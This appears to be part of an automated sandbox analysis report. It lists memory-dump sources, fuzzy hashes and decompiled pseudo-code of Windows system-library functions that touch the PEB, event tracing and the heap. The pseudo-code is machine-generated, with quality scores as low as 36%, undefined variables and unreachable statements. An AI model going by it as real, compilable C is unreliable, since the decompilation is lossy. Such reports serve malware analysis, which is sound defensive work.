0x04b6fe78
0x04b6fe83
0x04b6fe95
0x04b6fe85
0x04b6fe8e
0x04b6fe8e
0x04b6fea0
0x04b6fea1
0x04b6fea3
0x04b6fea8
0x04b6febd

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506c8fcf19e502ecf8e66f982a07fad376b6879384c244b90654bc10299aa811
Instruction ID: bb79ed89c480fcddaa13f137ca828bb15fcb22cdad461c87500c1f57578f87bc
Opcode Fuzzy Hash: 506c8fcf19e502ecf8e66f982a07fad376b6879384c244b90654bc10299aa811
Instruction Fuzzy Hash: E8018871E00208AFD714EFA9D845FAFBBB8EF44704F404066FA019B381DA74A911C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 04B88ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04B88ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4bad360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04AD7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x04b88ed6
0x04b88ee5
0x04b88eed
0x04b88ef0
0x04b88efa
0x04b88f03
0x04b88f0c
0x04b88f15
0x04b88f24
0x04b88f27
0x04b88f31
0x04b88f43
0x04b88f33
0x04b88f3c
0x04b88f3c
0x04b88f4e
0x04b88f4f
0x04b88f51
0x04b88f56
0x04b88f69

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 923b9e843858c774bd24bc93b75b1cadc0989ddc8f3771df0f49e2db4771245f
Instruction ID: 505800aaefd32d90f7baf9cce4c8a49ce8645e529e36c9a69973ac88f8db1a5c
Opcode Fuzzy Hash: 923b9e843858c774bd24bc93b75b1cadc0989ddc8f3771df0f49e2db4771245f
Instruction Fuzzy Hash: E611DE70E002599FDB44EFA9D541BAEF7F4FF08304F5442AAE519EB782E634A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B88A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04B88A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4bad360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04AD7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04b88a62
0x04b88a71
0x04b88a79
0x04b88a82
0x04b88a85
0x04b88a89
0x04b88a8c
0x04b88a8f
0x04b88a92
0x04b88a95
0x04b88a9f
0x04b88ab1
0x04b88aa1
0x04b88aaa
0x04b88aaa
0x04b88abc
0x04b88abd
0x04b88abf
0x04b88ac4
0x04b88ada

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d87b95c5e8e7e5729229b2c381c9644df2ffa4161004ed95cc488e6b5c7cb447
Instruction ID: b97ea71fc32c33a5e2cdbf1a0a1d495e0bbb98609863d51bcd43e8b72a4bbe8e
Opcode Fuzzy Hash: d87b95c5e8e7e5729229b2c381c9644df2ffa4161004ed95cc488e6b5c7cb447
Instruction Fuzzy Hash: 08012CB1A0021CAFDB04EFA9D9419EEB7B8EF48310F50405AFA05E7391E634A911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04ABDB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04ABDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04ABDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04ABE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L04ABE8B0(__ecx, _t14, 0xfff);
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x04abdb64
0x04abdb66
0x04abdb6b
0x04abdbaa
0x04abdb71
0x04abdb76
0x04abdb7a
0x04abdba3
0x04abdb7c
0x04abdb87
0x04abdb8b
0x04b14fa1
0x04b14fb3
0x04b14fb8
0x04abdb91
0x04abdb96
0x04abdb98
0x04abdb98
0x04abdb8b
0x04abdb7a
0x04abdb9d
0x04abdba2

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 170b579909624a78addd922cfb034f426f2c2a375b236f936089032b34f5e145
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: FEF0FC332015629FE7725B5589C0FD7B6AD8FE1B60F150035F1459B345CD64AC0296D4

Uniqueness

Uniqueness Score: -1.00%

Function 04ABB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04ABB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04AD7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04AD7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04B37016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x04abb1e8
0x04abb1ea
0x04abb1f3
0x04b14a17
0x04abb1f9
0x04abb1f9
0x04abb1f9
0x04abb201
0x04b14a21
0x04b14a2e
0x00000000
0x00000000
0x04b14a3b
0x04b14a4d
0x04b14a3d
0x04b14a46
0x04b14a46
0x04b14a55
0x00000000
0x00000000
0x00000000
0x04abb20a
0x04abb20a
0x04abb20a
0x04abb20a

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: c518f92723b251633e84534221554fe89ee366beabf2797313b297d640a10abf
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 2F01F4367106809BD322976DC904FA97B9CEF42754F4940A2F9558BAB2EA78F801C764

Uniqueness

Uniqueness Score: -1.00%

Function 04B4FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04B4FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4bad360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04AD7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04b4fe96
0x04b4fe9e
0x04b4fea1
0x04b4fead
0x04b4feb3
0x04b4feb9
0x04b4fec3
0x04b4fed5
0x04b4fec5
0x04b4fece
0x04b4fece
0x04b4fee0
0x04b4fee1
0x04b4fee3
0x04b4fee8
0x04b4fefb

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4259c34f2403af4a2fb8d439680dd6c1346adf0244914980d9dd04b7ea310c29
Instruction ID: 06b724ba29ba14e06f843297b279690ea1374ac6e7a618b5293f61159114fe83
Opcode Fuzzy Hash: 4259c34f2403af4a2fb8d439680dd6c1346adf0244914980d9dd04b7ea310c29
Instruction Fuzzy Hash: BD016270A00209EFCB14DFA8D542A6EB7F4EF04304F504599B509DB382E635EA01DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04B7131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04B7131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4bad360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04AD7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04b7131b
0x04b7132a
0x04b71330
0x04b71336
0x04b7133e
0x04b71341
0x04b71344
0x04b7134f
0x04b71361
0x04b71351
0x04b7135a
0x04b7135a
0x04b7136c
0x04b7136d
0x04b7136f
0x04b71374
0x04b71387

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2e7360a446d1fd9cf5936f9cc612b649cd7c79457a0aa9da0cb7396db462c94
Instruction ID: b98bf3551f3e9e201eb7a88445646afa25e963168f40f4c297eecee9d346df9a
Opcode Fuzzy Hash: d2e7360a446d1fd9cf5936f9cc612b649cd7c79457a0aa9da0cb7396db462c94
Instruction Fuzzy Hash: A5013171E01208AFDB04EFA9D545AAEB7F4FF08700F40405AB955EB341E634AA10CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04B88F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04B88F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4bad360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04AD7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04b88f6a
0x04b88f79
0x04b88f81
0x04b88f84
0x04b88f8b
0x04b88f91
0x04b88f94
0x04b88f9e
0x04b88fb0
0x04b88fa0
0x04b88fa9
0x04b88fa9
0x04b88fbb
0x04b88fbc
0x04b88fbe
0x04b88fc3
0x04b88fd6

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c7f5b03bddf3bf66762978327bf9cd45309a5c3161342b2d45b0e7456861b43
Instruction ID: 72a1846b103201aa24ca3a72bb3c0d0bca35303e916ce64816c5638cd7d6613e
Opcode Fuzzy Hash: 3c7f5b03bddf3bf66762978327bf9cd45309a5c3161342b2d45b0e7456861b43
Instruction Fuzzy Hash: B8014474E0020CAFDB04EFA8D545AAEB7F4EF18300F50445AB905EB391EA34EA10CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04B71608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04B71608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x4bad360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04AD7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x04b71608
0x04b71617
0x04b7161d
0x04b71625
0x04b71628
0x04b7162b
0x04b71636
0x04b71648
0x04b71638
0x04b71641
0x04b71641
0x04b71653
0x04b71654
0x04b71656
0x04b7165b
0x04b7166e

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a484f053f987728f01276dec6896ddef2ef9923efcddd5707801f34626ae7d
Instruction ID: 6106f930312a345834bdd267bf6642f51cfc241297cf7234ddb9d0003b8f97d7
Opcode Fuzzy Hash: 58a484f053f987728f01276dec6896ddef2ef9923efcddd5707801f34626ae7d
Instruction Fuzzy Hash: 88F04F71E00248EFDB14EFA9D945AAEB7F8EF04300F444099B915EB381E634EA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04ADC577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04ADC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04ADC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4a911cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04B888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x04adc577
0x04adc57d
0x04adc581
0x04adc5b5
0x04adc5b9
0x04adc5ce
0x04adc5ce
0x04adc5ca
0x00000000
0x04adc5ca
0x04adc5c4
0x04adc5c8
0x00000000
0x00000000
0x00000000
0x04adc5ad
0x00000000
0x04adc5af

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e762700a5e3c0f479a07d7ed3a4f46097582c6d55b27a9eee53575a41e7afa46
Instruction ID: 192d6ac4ac199510e64b4dfe156536417502c5c3bfe609d63b8a76921ae7b700
Opcode Fuzzy Hash: e762700a5e3c0f479a07d7ed3a4f46097582c6d55b27a9eee53575a41e7afa46
Instruction Fuzzy Hash: 7AF0E2B29956949FE732DB28C108B227FE99B0D774FD484ABD41787202C7A4FC80C251

Uniqueness

Uniqueness Score: -1.00%

Function 04B72073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04B72073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04B6FD22(__ecx);
				_t19 =  *0x4ba849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4ba8748; // 0x0
					if(__eflags <= 0) {
						E04B71C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4ba8724 & 0x00000004;
							if(( *0x4ba8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4ba8724; // 0x0
					return E04B68DF1(__ebx, 0xc0000374, 0x4ba5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x04b72076
0x04b72078
0x04b7207d
0x04b72083
0x04b720a4
0x04b720aa
0x04b720ac
0x04b720b7
0x04b720ba
0x04b720bc
0x04b720c9
0x04b720c9
0x04b720d0
0x04b720d2
0x00000000
0x04b720d2
0x04b720be
0x04b720c3
0x04b720c5
0x04b720c7
0x00000000
0x00000000
0x04b720c7
0x04b720bc
0x04b720d4
0x04b72085
0x04b72085
0x04b720a3
0x04b720a3

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b114f6425358199a4bbe07c9329b1e610080f3aad054b0c4b6654ffa5ae47a35
Instruction ID: 83ff62b591311f735889c3b2c3007609500d9db96fee79f3093467610880df84
Opcode Fuzzy Hash: b114f6425358199a4bbe07c9329b1e610080f3aad054b0c4b6654ffa5ae47a35
Instruction Fuzzy Hash: FCF0A06A82A1944AEF3A7F3975022E53B94E745118B0904C6D8B05B600C93CADA3EB70

Uniqueness

Uniqueness Score: -1.00%

Function 04B88D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E04B88D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4bad360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04AD7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x04b88d34
0x04b88d43
0x04b88d4b
0x04b88d4e
0x04b88d52
0x04b88d5c
0x04b88d6e
0x04b88d5e
0x04b88d67
0x04b88d67
0x04b88d79
0x04b88d7a
0x04b88d7c
0x04b88d81
0x04b88d94

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bb125933da29cedf2fd2235324d172d3a41135109c9e54328616642d54f65e
Instruction ID: 389268416dc1d144576db14ec1f239a052124641084f57f0e047fa80f15950f5
Opcode Fuzzy Hash: a4bb125933da29cedf2fd2235324d172d3a41135109c9e54328616642d54f65e
Instruction Fuzzy Hash: 06F05470E046089FDB14FFB9D545B6EB7B8EF14704F508099F916EB291EA34E900DB54

Uniqueness

Uniqueness Score: -1.00%

Function 04AF927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04AF927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E04AFFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E04AF92C6(_t11, _t14);
				}
				return _t11;
			}

0x04af9295
0x04af9299
0x04af929f
0x04af92aa
0x04af92ad
0x04af92ae
0x04af92af
0x04af92b0
0x04af92b4
0x04af92bb
0x04af92bb
0x04af92c5

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 848602dc00fb83ea357b8ff3c9b5872f8d81ecd66d64cf85fe96d0353723dd12
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: D8E0E5722405002BE7119F85CC80B03765DAF82724F004079B6001F242C6E5E80887A0

Uniqueness

Uniqueness Score: -1.00%

Function 04B88CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04B88CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4bad360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04AD7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04b88ce5
0x04b88ced
0x04b88cf0
0x04b88cfb
0x04b88d0d
0x04b88cfd
0x04b88d06
0x04b88d06
0x04b88d18
0x04b88d19
0x04b88d1b
0x04b88d20
0x04b88d33

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03fa35c1c2a6977cfdaf2779b89ce5725cbf9df9aae033d9b0814b51809b71ed
Instruction ID: 8779e8b16930fdd303b8344af6c7f27c69a01c4db339a377e0a3a3f39ab23d2b
Opcode Fuzzy Hash: 03fa35c1c2a6977cfdaf2779b89ce5725cbf9df9aae033d9b0814b51809b71ed
Instruction Fuzzy Hash: 63F08970A041089BDB04FBA9D945E6E77B8EF05304F50019DF516EB281E934E900D754

Uniqueness

Uniqueness Score: -1.00%

Function 04AD746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04AD746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04ACEB70(__ecx, 0x4ba79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04AF95D0();
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x04ad746d
0x04ad746d
0x04ad746d
0x04ad7471
0x04ad7488
0x04b1f92d
0x04ad748e
0x04ad7491
0x04ad7495
0x04b1f937
0x04b1f93a
0x04b1f94e
0x04b1f953
0x04b1f956
0x04b1f956
0x04ad7495
0x00000000
0x04ad7488
0x04ad7473
0x04ad7478
0x04ad747d
0x04ad7481
0x00000000
0x04ad7481
0x04ad747d
0x04ad747a
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
